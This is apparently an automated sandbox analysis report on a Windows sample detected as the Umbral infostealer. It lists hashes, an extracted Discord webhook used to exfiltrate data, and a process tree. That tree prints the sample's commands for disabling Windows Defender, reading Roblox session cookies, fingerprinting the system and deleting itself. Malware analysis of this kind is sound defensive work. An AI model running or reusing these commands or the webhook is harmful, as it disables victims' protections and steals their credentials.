Analysis
-
max time kernel
119s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20231025-en -
resource tags
arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system -
submitted
11-11-2023 00:50
Behavioral task
behavioral1
Sample
NEAS.0aece04789b6892b13e1985bb08a7200.exe
Resource
win7-20231025-en
General
-
Target
NEAS.0aece04789b6892b13e1985bb08a7200.exe
-
Size
278KB
-
MD5
0aece04789b6892b13e1985bb08a7200
-
SHA1
49339cc3e987f517ab8ec2e6cb1baa19fbbc675f
-
SHA256
a6c6b2a4d581d6f5f1e661b0d0e390107ea79a7075700e48cfe41442c1e2eb06
-
SHA512
4d15c6bfd7c32f34fbbbb63cb4e974cd6f0d45f8f42605c4778cfb6dfccf527fa668717f70d955784e46899815a7a030cbe48616c0b93fe1825e80dfd5ca8b9d
-
SSDEEP
6144:pLGrA0UloZM9rIkd8g+EtXHkv/iD4ZZACl98e1mbix:eA0SoZOL+EP8h7n
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1170536634891128902/hdNxkvpSxRXfW2ouud2imDE8eFbcAfoi3fBBxpcoRyxI8E-rxHT7NHLuI-Q-ThYq7M3H
Signatures
-
Detect Umbral payload 4 IoCs
resource yara_rule behavioral1/files/0x000c00000001226b-8.dat family_umbral behavioral1/files/0x000c00000001226b-9.dat family_umbral behavioral1/memory/2568-10-0x0000000000090000-0x00000000000D0000-memory.dmp family_umbral behavioral1/memory/2568-12-0x000000001B000000-0x000000001B080000-memory.dmp family_umbral -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe -
Executes dropped EXE 2 IoCs
pid Process 2984 BoH67tHWD2j1mufsoo6RmaIfHEWHs5qN.exe 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 ip-api.com -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\Speech\dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe attrib.exe File created C:\Windows\System32\Speech\BoH67tHWD2j1mufsoo6RmaIfHEWHs5qN.exe NEAS.0aece04789b6892b13e1985bb08a7200.exe File created C:\Windows\System32\Speech\dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe NEAS.0aece04789b6892b13e1985bb08a7200.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1280 wmic.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F64CEA91-8035-11EE-AF1C-FA9360DBF9A1} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002e1e81ecbc95de49994f369c3e717184000000000200000000001066000000010000200000004ec695e15ca33ccb78ffe41f663fc3fc625f41c6270826bea753f91f5a8575f2000000000e8000000002000020000000863544a6a114409a7bee37bbebee14af03a016c2f1a369973c4de2746ed313ce20000000fef107d48cb9aa3949aa7939c79415498cd5dbb9404f16fe95d2e8517e5b27014000000050b0a0dd41daf7d172e70fcbbabc0fd695216b224bc4c01ff38875ea25806df8a1a6ecbd25b11f54814ac26567fd643475270d0a9bdedb691a8c0c180b7c5b4d iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "405829852" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 906c75ce4214da01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002e1e81ecbc95de49994f369c3e717184000000000200000000001066000000010000200000009e8c38f9e1eccb9e7342cf01bf46456706a5142cf666fc2412eb68bb6f103fb4000000000e80000000020000200000004f58a6f4aa664d971170eff164f78977ec6eaa3a35756e60c4d786408858241490000000cbd3f0a1e4fac095cac4c162aea8fb949a0a42009f7e546a84d9888a56e9c267cfa62b0fc4ca5b1f18aaa6e4d5fb6a3896e86762aef45006ececd94977d36c77d80373b715d417c222910085c67529496fb06a2aaebf20c31fbf1911faa840455ab553efa6958d0d625dc7a4216620389d989695a45d95ebe8c39210e6383607b46e24bfb9bb5f4fd7338552256838fa40000000fcdb1b23bba49c621c50a80bb5ff619a47d73e557480edcee8168c7ad5a8d0eff6747fbfa1ff47cbce1b4aed4b0706a85c92e05372fab0040d57ff2c0b79559d iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2428 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 436 powershell.exe 1516 powershell.exe 1804 powershell.exe 2128 powershell.exe 2872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 2128 powershell.exe Token: SeIncreaseQuotaPrivilege 1524 wmic.exe Token: SeSecurityPrivilege 1524 wmic.exe Token: SeTakeOwnershipPrivilege 1524 wmic.exe Token: SeLoadDriverPrivilege 1524 wmic.exe Token: SeSystemProfilePrivilege 1524 wmic.exe Token: SeSystemtimePrivilege 1524 wmic.exe Token: SeProfSingleProcessPrivilege 1524 wmic.exe Token: SeIncBasePriorityPrivilege 1524 wmic.exe Token: SeCreatePagefilePrivilege 1524 wmic.exe Token: SeBackupPrivilege 1524 wmic.exe Token: SeRestorePrivilege 1524 wmic.exe Token: SeShutdownPrivilege 1524 wmic.exe Token: SeDebugPrivilege 1524 wmic.exe Token: SeSystemEnvironmentPrivilege 1524 wmic.exe Token: SeRemoteShutdownPrivilege 1524 wmic.exe Token: SeUndockPrivilege 1524 wmic.exe Token: SeManageVolumePrivilege 1524 wmic.exe Token: 33 1524 wmic.exe Token: 34 1524 wmic.exe Token: 35 1524 wmic.exe Token: SeIncreaseQuotaPrivilege 1524 wmic.exe Token: SeSecurityPrivilege 1524 wmic.exe Token: SeTakeOwnershipPrivilege 1524 wmic.exe Token: SeLoadDriverPrivilege 1524 wmic.exe Token: SeSystemProfilePrivilege 1524 wmic.exe Token: SeSystemtimePrivilege 1524 wmic.exe Token: SeProfSingleProcessPrivilege 1524 wmic.exe Token: SeIncBasePriorityPrivilege 1524 wmic.exe Token: SeCreatePagefilePrivilege 1524 wmic.exe Token: SeBackupPrivilege 1524 wmic.exe Token: SeRestorePrivilege 1524 wmic.exe Token: SeShutdownPrivilege 1524 wmic.exe Token: SeDebugPrivilege 1524 wmic.exe Token: SeSystemEnvironmentPrivilege 1524 wmic.exe Token: SeRemoteShutdownPrivilege 1524 wmic.exe Token: SeUndockPrivilege 1524 wmic.exe Token: SeManageVolumePrivilege 1524 wmic.exe Token: 33 1524 wmic.exe Token: 34 1524 wmic.exe Token: 35 1524 wmic.exe Token: SeIncreaseQuotaPrivilege 2868 wmic.exe Token: SeSecurityPrivilege 2868 wmic.exe Token: SeTakeOwnershipPrivilege 2868 wmic.exe Token: SeLoadDriverPrivilege 2868 wmic.exe Token: SeSystemProfilePrivilege 2868 wmic.exe Token: SeSystemtimePrivilege 2868 wmic.exe Token: SeProfSingleProcessPrivilege 2868 wmic.exe Token: SeIncBasePriorityPrivilege 2868 wmic.exe Token: SeCreatePagefilePrivilege 2868 wmic.exe Token: SeBackupPrivilege 2868 wmic.exe Token: SeRestorePrivilege 2868 wmic.exe Token: SeShutdownPrivilege 2868 wmic.exe Token: SeDebugPrivilege 2868 wmic.exe Token: SeSystemEnvironmentPrivilege 2868 wmic.exe Token: SeRemoteShutdownPrivilege 2868 wmic.exe Token: SeUndockPrivilege 2868 wmic.exe Token: SeManageVolumePrivilege 2868 wmic.exe Token: 33 2868 wmic.exe Token: 34 2868 wmic.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2692 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2692 iexplore.exe 2692 iexplore.exe 2476 IEXPLORE.EXE 2476 IEXPLORE.EXE 2476 IEXPLORE.EXE 2476 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target PID 2168 wrote to memory of 2984 2168 NEAS.0aece04789b6892b13e1985bb08a7200.exe 29 PID 2168 wrote to memory of 2984 2168 NEAS.0aece04789b6892b13e1985bb08a7200.exe 29 PID 2168 wrote to memory of 2984 2168 NEAS.0aece04789b6892b13e1985bb08a7200.exe 29 PID 2168 wrote to memory of 2984 2168 NEAS.0aece04789b6892b13e1985bb08a7200.exe 29 PID 2168 wrote to memory of 2568 2168 NEAS.0aece04789b6892b13e1985bb08a7200.exe 30 PID 2168 wrote to memory of 2568 2168 NEAS.0aece04789b6892b13e1985bb08a7200.exe 30 PID 2168 wrote to memory of 2568 2168 NEAS.0aece04789b6892b13e1985bb08a7200.exe 30 PID 2168 wrote to memory of 2648 2168 NEAS.0aece04789b6892b13e1985bb08a7200.exe 31 PID 2168 wrote to memory of 2648 2168 NEAS.0aece04789b6892b13e1985bb08a7200.exe 31 PID 2168 wrote to memory of 2648 2168 NEAS.0aece04789b6892b13e1985bb08a7200.exe 31 PID 2984 wrote to memory of 2692 2984 BoH67tHWD2j1mufsoo6RmaIfHEWHs5qN.exe 32 PID 2984 wrote to memory of 2692 2984 BoH67tHWD2j1mufsoo6RmaIfHEWHs5qN.exe 32 PID 2984 wrote to memory of 2692 2984 BoH67tHWD2j1mufsoo6RmaIfHEWHs5qN.exe 32 PID 2984 wrote to memory of 2692 2984 BoH67tHWD2j1mufsoo6RmaIfHEWHs5qN.exe 32 PID 2692 wrote to memory of 2476 2692 iexplore.exe 34 PID 2692 wrote to memory of 2476 2692 iexplore.exe 34 PID 2692 wrote to memory of 2476 2692 iexplore.exe 34 PID 2692 wrote to memory of 2476 2692 iexplore.exe 34 PID 2568 wrote to memory of 2368 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 38 PID 2568 wrote to memory of 2368 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 38 PID 2568 wrote to memory of 2368 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 38 PID 2568 wrote to memory of 436 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 40 PID 2568 wrote to memory of 436 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 40 PID 2568 wrote to memory of 436 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 40 PID 2568 wrote to memory of 1516 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 42 PID 2568 wrote to memory of 1516 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 42 PID 2568 wrote to memory of 1516 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 42 PID 2568 wrote to memory of 1804 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 44 PID 2568 wrote to memory of 1804 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 44 PID 2568 wrote to memory of 1804 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 44 PID 2568 wrote to memory of 2128 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 47 PID 2568 wrote to memory of 2128 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 47 PID 2568 wrote to memory of 2128 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 47 PID 2568 wrote to memory of 1524 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 48 PID 2568 wrote to memory of 1524 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 48 PID 2568 wrote to memory of 1524 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 48 PID 2568 wrote to memory of 2868 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 51 PID 2568 wrote to memory of 2868 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 51 PID 2568 wrote to memory of 2868 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 51 PID 2568 wrote to memory of 3056 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 53 PID 2568 wrote to memory of 3056 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 53 PID 2568 wrote to memory of 3056 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 53 PID 2568 wrote to memory of 2872 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 55 PID 2568 wrote to memory of 2872 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 55 PID 2568 wrote to memory of 2872 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 55 PID 2568 wrote to memory of 1280 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 57 PID 2568 wrote to memory of 1280 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 57 PID 2568 wrote to memory of 1280 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 57 PID 2568 wrote to memory of 2292 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 59 PID 2568 wrote to memory of 2292 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 59 PID 2568 wrote to memory of 2292 2568 dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe 59 PID 2292 wrote to memory of 2428 2292 cmd.exe 61 PID 2292 wrote to memory of 2428 2292 cmd.exe 61 PID 2292 wrote to memory of 2428 2292 cmd.exe 61 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2368 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\NEAS.0aece04789b6892b13e1985bb08a7200.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.0aece04789b6892b13e1985bb08a7200.exe"1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\System32\Speech\BoH67tHWD2j1mufsoo6RmaIfHEWHs5qN.exeC:\Windows\System32\Speech\BoH67tHWD2j1mufsoo6RmaIfHEWHs5qN.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=BoH67tHWD2j1mufsoo6RmaIfHEWHs5qN.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.03⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2692 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2476
-
-
-
-
C:\Windows\System32\Speech\dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exeC:\Windows\System32\Speech\dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Windows\System32\Speech\dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe"3⤵
- Drops file in System32 directory
- Views/modifies file attributes
PID:2368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\Speech\dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2872
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1280
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Windows\System32\Speech\dPQEUfH6rXRaK1QP66KXt95OCCpAJJcC.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:2428
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause2⤵PID:2648
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50b6d44260f643e03a3826f7766079005
SHA1fc1664fec28ca6b7c919284ebda17137108c3212
SHA256ad0de84afff5da704c72f1af62b4d9a400237db81b82c4d49b9891f2fe600c3c
SHA51213406ed8a24d48663bff523ab2342fc843878596281929b33a5dffabdf4fdbae63c6c93a28365f7eb05fa2be853b55a4a983d17a9024318a4629c26ef3c37d22
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5bb967dd6770140d01d820ae57d5b3631
SHA1c58683480f33f1106d0960d31cd09d72f858206f
SHA2568a5e9248682fe1c25189d1594ba83653ba428f2bd1aebf019c76faf4cf3abfe6
SHA51287dd7bba4dba4681e0d995ac81b2a7b3a41aa077dc3bff21c4943e2bdf49e788ce2f4451a2debddc6a90f120a37f374f808a906f112e272c6bcf0587a79f554c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50def9e6583cd3465dbc9486baa461407
SHA1fa87156e453490d50dd42bfa84530f1261ff47c9
SHA256bda672dc60bf1ef5e84d88217d10f3149092f558e2bdfcbda703905a57123f6e
SHA512f247f103f80af658aa3219c87248509c08da490b8746c2fd5c11f28ec22ca9ac62fbb64a9f32edd5027e2f768dabbce6eccb78897f07e1b7279a308fd32435c7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5527be69b1c92bda1f0f375d02a8963ef
SHA128f7cb5d6783aa51abe6e9caba74feb4d754e036
SHA256b5c8789683741de0049eaea2a12109eee01d3179361fb49f0f910b2f0e07dafa
SHA512759fcfcdf05a59cf581789bcb150f22b110fe15ed201fe19ab260653222af25bb7172920f197d2d091f3436fb27aa613808f2eafd2299129af118680afe04fa9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5b2c98fd95f1c25047d41de8e19783c3f
SHA13fccd63952b64d5dd8c11e78cd9b6963d48f296c
SHA2567f0b826eaba60333fd94502e951f58da9f1b61471f91601c37f453c50fa3a359
SHA512182365ab947c2ba71221cd5b5a55df9894fdda55aed2622e4bb8512cf0826e9f7aca2bbbde44ed8062d9342931064bd9822529463d52d95c88abe97fa9eaa54a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD506911c821c30aa148c59770329570383
SHA1621c859ca755412d79bc64d9f7be7da02514471d
SHA2569e0bd3f2582e89f69237fec42d56755dd8bc8745fb5747ef4a1adaad8315c08e
SHA51233958c4ede10816d5918c4f44172c5a2dca7539607e6c9baf67596aa5eda95a720035f4f9879c70a05863cc41316e34e04a8adc373cfbb7bff358b1ed507d0c4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD529897bd8438a40f6763f6a53e5239c28
SHA16ea2881da4b509384763f7e392c6be1862b8a92c
SHA2561c440f5dad22a05f238d995c6e20e91132adb0407ba1c9dd63fe4a86a3ac8f16
SHA512b480404a723520fafc78a306e1d1a9bcf4d8fe4fd54b5e53b18b7da6e6f9385d79e5efe2b3ea2610f6fa6c5dbccb6fcd7a0a3ab33b07d6c853ad91501cfcaa31
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD52d42de2c2e3254588adcb965d8b1b51f
SHA1609a94001ca268999b0d0368c034a52a65f38977
SHA25683c2797696fb78165ff51b9124d58a0ed86dd7b54fe70fd84952e66edef0748b
SHA512725d8ed0f76575e45f3a1b4bc74f17afc4dc4241bc88c7c10669ef69dcd4d193bac08ee8d426507fc9fcdc07eda2958eee62c858c18079c0910c5537129ae940
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5bb0d5b279e1f86ff162dce6d3082adf6
SHA1df7094a215388e6c66dd33a3e544eac120972722
SHA256a094494151922c5cbef3daecb5382464ae80632b28800bfe26a17585578fc454
SHA51239f285dd68541044f045bdaefef04d329fc9184c5b8c45653f7dcc60145fcbbaea7fe436ebc103098c77387b5e67287510e7f4870ba0b10f0e3b19d987d7898c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD513699b3f976fbd34af1eaa5490877986
SHA1675f34d84e07fdea8cd0783478a4ca4c4ff743c1
SHA2565541c858051dc975d0d553412a525df28a2c5b9eaf8fad3773fa80e438855103
SHA512143e67c052e3a69e8ba214f7eed2148b531ec594f3e4316d3bffe101af9c4a252fc425eb6e2c6a6663cc70830613edafc4f96d6feb15c3eaddd2b072bc31a470
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD57231e4df82b2cbcb6ef4a506a55c9358
SHA1c97cefc5d0510d24e941e5b2beab49f1bb22c9f0
SHA256e793b5b08ba50ef1e86bbfa104a391376b1a858978e778567abc19807fe4a91b
SHA5123c21550cd598818c173ca6b063489747d9314f4a9459937a153db86b5c2d34f3c675ce0b67cce7192a5008e3e76049bc3517f9a8a8ae2f91dae7745526874af3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5d41879425caec850736b5ac2257173d7
SHA1743209f3435385373a929f63479624e0d7eb9061
SHA2568fa578f9e5756ccd8c0c87d32868135d055e9749b12d5cdc4d1120010b3ef353
